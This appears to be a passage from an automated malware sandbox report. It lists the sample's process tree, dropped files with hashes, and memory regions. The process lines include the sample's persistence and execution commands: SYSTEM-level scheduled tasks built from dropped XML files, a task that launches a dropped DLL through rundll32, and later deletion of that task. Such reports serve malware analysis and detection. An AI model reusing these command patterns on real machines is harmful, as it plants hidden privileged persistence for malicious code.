C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRPkNtVzIKzIqGA2" /F /xml "C:\Program Files (x86)\WcpDpTQRU\rSwiEOY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bRPkNtVzIKzIqGA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRPkNtVzIKzIqGA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BRJsOcfwVxexGL" /F /xml "C:\Program Files (x86)\HSbxAtpKDhQU2\BXvQWsI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cVegHAiKFgMED2" /F /xml "C:\ProgramData\rThwBnsAuYFVuyVB\CrHnCJp.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iwbWbDECwmvAxebMK2" /F /xml "C:\Program Files (x86)\vONtrOkcmiWVHKGuTIR\nVVtQQx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hrweEGQIthjryZHTjBE2" /F /xml "C:\Program Files (x86)\VwRFfGirhYNWC\DFxOeyB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KzfKcfuheaVbQmBdJ" /SC once /ST 07:25:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HQlSiZkrEcWzlGAW\YThMhkJk\OXTVSxR.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "KzfKcfuheaVbQmBdJ"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 21082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 11922⤵
- Program crash
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HQlSiZkrEcWzlGAW\YThMhkJk\OXTVSxR.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HQlSiZkrEcWzlGAW\YThMhkJk\OXTVSxR.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KzfKcfuheaVbQmBdJ"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1992 -ip 19921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1992 -ip 19921⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\HSbxAtpKDhQU2\BXvQWsI.xmlFilesize
2KB
MD5269469e66357c836439ebc922c608672
SHA1ae193152cb48393482572c66e58ed6ea2245c755
SHA2567c610e0b69f896c7e3d0ea71d75925ef7bea8df02e6707bc83e272168251931b
SHA512f9049f357a1dee2a3dc81d2948c4b8029bacaa2f4c683018d55bdb730b7c0fbfda31a2b71789cc86f8894a9f751b374c02a0f7bb1eaec0e1781d8a452b740814
-
C:\Program Files (x86)\VwRFfGirhYNWC\DFxOeyB.xmlFilesize
2KB
MD5ba9f45c79586e82911305ea56dc51189
SHA17dc085c07e37fe247738503e576e873c5d5e64d7
SHA256d8973f8f477994e6cde3d91ce27c5d02bbe8eed04823666bcdd6ad7b7969c4bf
SHA51235c5f70ad5d9de86f545c68f6ff3a53560247c2a6171e018f8d4a51dc869a6c524b4c52e9b10848f651cd5b543c18ab9bba242b59d853def7da64ff5cba560cb
-
C:\Program Files (x86)\WcpDpTQRU\rSwiEOY.xmlFilesize
2KB
MD56aca299b94b09e3c95f7a0cf286153fb
SHA1c5b48c0be8544d61145f1dbe54095197717f5b25
SHA2561a316157d3b6729441bf3584b2acbcb63a8a8f4836b33915c3b1e42265b7ce11
SHA51268b238d7835d299829c7aabba3f6210dd2d4d116440ac95e5faefd1a832c8569c86ecc04468efa2c1b4bb9f02126cbb2bc95ba6c85f7bf82703d9574c1149820
-
C:\Program Files (x86)\vONtrOkcmiWVHKGuTIR\nVVtQQx.xmlFilesize
2KB
MD554b638ec9fbff572d0e3b0f168502f2f
SHA14d63c1388b255939060562c4d1d255a2c4fc6577
SHA25697deaa8f3abf50ed4d633fe61b7019cb7af76bacf9e8d02609e4c507523d4747
SHA512f5235497986e6adf51c166787ba5c6bfcb6b7e835542e900de98f03c0cfa31d0bff788a84ffafbabd154947d8eb279fba76ca0ba1776ec73e2b360d98b9e0b47
-
C:\ProgramData\rThwBnsAuYFVuyVB\CrHnCJp.xmlFilesize
2KB
MD56a97679a68c5a2e45edaba23e73fb85b
SHA1dde6e01a9af6f3a151be64dfe89195496beca249
SHA25651cf54edc0e125402df39df3da863d3027806f752089b3380371d46ccfab0af3
SHA5122c2c7ef2a8e6832e1a824a35b366cfe173df7c3fd7a2d5fd4e441d2c9d15ff0e2853acb71fa0b357bdac92db01dc9a794cfb91c8dd88fd477a02e328ee02a054
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
C:\Users\Admin\AppData\Local\Temp\7zSF707.tmp\Install.exeFilesize
6.3MB
MD5e3ef96614e42747c4f3ac0e8e6084971
SHA1ba1b1178e1b1bf40c31639d27fb6fb9d0a3957b3
SHA2565fc3ad6af7aabd25ed839677e888dfee6492ce6e9f65d9cc8f269bac4241be10
SHA512abc0d4aed3984775351307c9b8984e842bcd099cb52c7e04cbe2de634d70faabb507cb4c95b1c4887dc653815d084cb05929f461744cd1737adede0225a1253b
-
C:\Users\Admin\AppData\Local\Temp\7zSF707.tmp\Install.exeFilesize
6.3MB
MD5e3ef96614e42747c4f3ac0e8e6084971
SHA1ba1b1178e1b1bf40c31639d27fb6fb9d0a3957b3
SHA2565fc3ad6af7aabd25ed839677e888dfee6492ce6e9f65d9cc8f269bac4241be10
SHA512abc0d4aed3984775351307c9b8984e842bcd099cb52c7e04cbe2de634d70faabb507cb4c95b1c4887dc653815d084cb05929f461744cd1737adede0225a1253b
-
C:\Users\Admin\AppData\Local\Temp\7zSFB2D.tmp\Install.exeFilesize
6.9MB
MD5d79a29b6aa821673c188f915dc56ae80
SHA12421d06578a21df21502845505690da36500ceef
SHA256c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225
SHA5122da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25
-
C:\Users\Admin\AppData\Local\Temp\7zSFB2D.tmp\Install.exeFilesize
6.9MB
MD5d79a29b6aa821673c188f915dc56ae80
SHA12421d06578a21df21502845505690da36500ceef
SHA256c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225
SHA5122da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25
-
C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bmvtpTB.exeFilesize
6.9MB
MD5d79a29b6aa821673c188f915dc56ae80
SHA12421d06578a21df21502845505690da36500ceef
SHA256c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225
SHA5122da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25
-
C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bmvtpTB.exeFilesize
6.9MB
MD5d79a29b6aa821673c188f915dc56ae80
SHA12421d06578a21df21502845505690da36500ceef
SHA256c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225
SHA5122da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5279c6cc5d35f79ab96ac068800eeaba3
SHA10f89434fc171dbd876df55bb1a0609891973c6ec
SHA256110da1e706a6cd1c5f7101ace3b6b7b863434c1d32432833d188222325699660
SHA51281f987cbce8543a1bc46942878a62932fd903ae6ed0ad042b617447e5e32675d768da670db4817e6a27b260076a08a66dff1d5e7872b3a5907ef560dd51b1b2e
-
C:\Windows\Temp\HQlSiZkrEcWzlGAW\YThMhkJk\OXTVSxR.dllFilesize
6.2MB
MD588ecfcb5ceeea556cafa43127fe0363f
SHA1a93d9e1b444610c4fe58e29a8125d76c7c2d5162
SHA256885f2add35e3c655bd4663d72cffb791d68bcb132a6ea13594cdd8ff1af0e9af
SHA512c2fe0c14bb9592aa651fa56e811b537634b4f142bd11cd5a6e0578f5495cfe06efcfa502b224cc40468cb73eb9da2cee3f7704ab1d5aea861a4630dd99e59d6a
-
C:\Windows\Temp\HQlSiZkrEcWzlGAW\YThMhkJk\OXTVSxR.dllFilesize
6.2MB
MD588ecfcb5ceeea556cafa43127fe0363f
SHA1a93d9e1b444610c4fe58e29a8125d76c7c2d5162
SHA256885f2add35e3c655bd4663d72cffb791d68bcb132a6ea13594cdd8ff1af0e9af
SHA512c2fe0c14bb9592aa651fa56e811b537634b4f142bd11cd5a6e0578f5495cfe06efcfa502b224cc40468cb73eb9da2cee3f7704ab1d5aea861a4630dd99e59d6a
-
C:\Windows\Temp\HQlSiZkrEcWzlGAW\uBfWLVVXjViPVDU\cbRFWOg.exeFilesize
6.9MB
MD5d79a29b6aa821673c188f915dc56ae80
SHA12421d06578a21df21502845505690da36500ceef
SHA256c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225
SHA5122da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25
-
C:\Windows\Temp\HQlSiZkrEcWzlGAW\uBfWLVVXjViPVDU\cbRFWOg.exeFilesize
6.9MB
MD5d79a29b6aa821673c188f915dc56ae80
SHA12421d06578a21df21502845505690da36500ceef
SHA256c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225
SHA5122da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
4KB
MD5fd2446814f58832ee2beb7596e4d59ee
SHA171829d1a05c6f159b94562e371784fa48547d8fd
SHA2560349a976412f05870f75a94b350e7e3c471a4a1b2c40d5affa140dc331584ac5
SHA512d38c1b28a76c8d018c31d8ab88dfdf6a6c40f01d9f8cc330deb3fd46cfe80f5479029853a14937fd2923d2cf8380303adce8b04eb30849756811da8507c52567
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/100-146-0x0000000000000000-mapping.dmp
-
memory/112-170-0x0000000000000000-mapping.dmp
-
memory/208-145-0x0000000000000000-mapping.dmp
-
memory/212-174-0x0000000000000000-mapping.dmp
-
memory/312-183-0x0000000000000000-mapping.dmp
-
memory/372-171-0x0000000000000000-mapping.dmp
-
memory/384-210-0x0000000000000000-mapping.dmp
-
memory/448-193-0x0000000000000000-mapping.dmp
-
memory/448-151-0x0000020CC0CC0000-0x0000020CC0CE2000-memory.dmpFilesize
136KB
-
memory/448-152-0x00007FF98FA40000-0x00007FF990501000-memory.dmpFilesize
10.8MB
-
memory/448-154-0x00007FF98FA40000-0x00007FF990501000-memory.dmpFilesize
10.8MB
-
memory/832-190-0x0000000000000000-mapping.dmp
-
memory/860-209-0x0000000000000000-mapping.dmp
-
memory/944-197-0x0000000000000000-mapping.dmp
-
memory/1008-135-0x0000000000000000-mapping.dmp
-
memory/1008-138-0x0000000019740000-0x000000001A109000-memory.dmpFilesize
9.8MB
-
memory/1192-220-0x00007FF98EDC0000-0x00007FF98F881000-memory.dmpFilesize
10.8MB
-
memory/1192-221-0x00007FF98EDC0000-0x00007FF98F881000-memory.dmpFilesize
10.8MB
-
memory/1220-205-0x0000000000000000-mapping.dmp
-
memory/1288-191-0x0000000000000000-mapping.dmp
-
memory/1360-215-0x0000000000000000-mapping.dmp
-
memory/1392-189-0x0000000000000000-mapping.dmp
-
memory/1484-223-0x0000000000000000-mapping.dmp
-
memory/1552-247-0x0000000001E10000-0x00000000027D9000-memory.dmpFilesize
9.8MB
-
memory/1608-207-0x0000000000000000-mapping.dmp
-
memory/1668-159-0x0000000017CC0000-0x0000000018689000-memory.dmpFilesize
9.8MB
-
memory/1696-176-0x0000000000000000-mapping.dmp
-
memory/1800-172-0x0000000000000000-mapping.dmp
-
memory/1836-198-0x0000000000000000-mapping.dmp
-
memory/1848-175-0x0000000000000000-mapping.dmp
-
memory/1916-150-0x0000000000000000-mapping.dmp
-
memory/1916-186-0x0000000000000000-mapping.dmp
-
memory/1992-243-0x000000001A010000-0x000000001A085000-memory.dmpFilesize
468KB
-
memory/1992-226-0x0000000017DF0000-0x00000000187B9000-memory.dmpFilesize
9.8MB
-
memory/1992-233-0x00000000196A0000-0x00000000196FF000-memory.dmpFilesize
380KB
-
memory/1992-229-0x0000000019050000-0x00000000190D5000-memory.dmpFilesize
532KB
-
memory/2252-179-0x0000000000000000-mapping.dmp
-
memory/2300-178-0x0000000000000000-mapping.dmp
-
memory/2572-204-0x0000000000000000-mapping.dmp
-
memory/2704-185-0x0000000000000000-mapping.dmp
-
memory/2836-155-0x0000000000000000-mapping.dmp
-
memory/2996-169-0x0000000000000000-mapping.dmp
-
memory/3016-199-0x0000000000000000-mapping.dmp
-
memory/3280-194-0x0000000000000000-mapping.dmp
-
memory/3408-177-0x0000000000000000-mapping.dmp
-
memory/3668-142-0x0000000000000000-mapping.dmp
-
memory/3692-143-0x0000000000000000-mapping.dmp
-
memory/3780-213-0x0000000000000000-mapping.dmp
-
memory/3792-163-0x0000000000E60000-0x0000000000E96000-memory.dmpFilesize
216KB
-
memory/3792-167-0x00000000041D0000-0x0000000004236000-memory.dmpFilesize
408KB
-
memory/3792-164-0x0000000003990000-0x0000000003FB8000-memory.dmpFilesize
6.2MB
-
memory/3792-168-0x00000000047D0000-0x00000000047EE000-memory.dmpFilesize
120KB
-
memory/3792-162-0x0000000000000000-mapping.dmp
-
memory/3792-166-0x00000000040F0000-0x0000000004156000-memory.dmpFilesize
408KB
-
memory/3792-165-0x0000000003910000-0x0000000003932000-memory.dmpFilesize
136KB
-
memory/3828-216-0x0000000000000000-mapping.dmp
-
memory/3860-181-0x0000000000000000-mapping.dmp
-
memory/3916-192-0x0000000000000000-mapping.dmp
-
memory/3976-188-0x0000000000000000-mapping.dmp
-
memory/4124-132-0x0000000000000000-mapping.dmp
-
memory/4136-182-0x0000000000000000-mapping.dmp
-
memory/4136-149-0x0000000000000000-mapping.dmp
-
memory/4156-206-0x0000000000000000-mapping.dmp
-
memory/4264-212-0x0000000000000000-mapping.dmp
-
memory/4360-187-0x0000000000000000-mapping.dmp
-
memory/4428-141-0x0000000000000000-mapping.dmp
-
memory/4580-180-0x0000000000000000-mapping.dmp
-
memory/4620-211-0x0000000000000000-mapping.dmp
-
memory/4656-184-0x0000000000000000-mapping.dmp
-
memory/4756-200-0x0000000000000000-mapping.dmp
-
memory/4792-148-0x0000000000000000-mapping.dmp
-
memory/4860-219-0x0000000000000000-mapping.dmp
-
memory/4884-144-0x0000000000000000-mapping.dmp
-
memory/4888-173-0x0000000000000000-mapping.dmp
-
memory/4896-208-0x0000000000000000-mapping.dmp
-
memory/4900-203-0x0000000000000000-mapping.dmp
-
memory/4944-202-0x0000000000000000-mapping.dmp
-
memory/4952-222-0x0000000000000000-mapping.dmp
-
memory/4960-201-0x0000000000000000-mapping.dmp
-
memory/4976-153-0x0000000000000000-mapping.dmp
-
memory/4988-147-0x0000000000000000-mapping.dmp
-
memory/4996-156-0x0000000000000000-mapping.dmp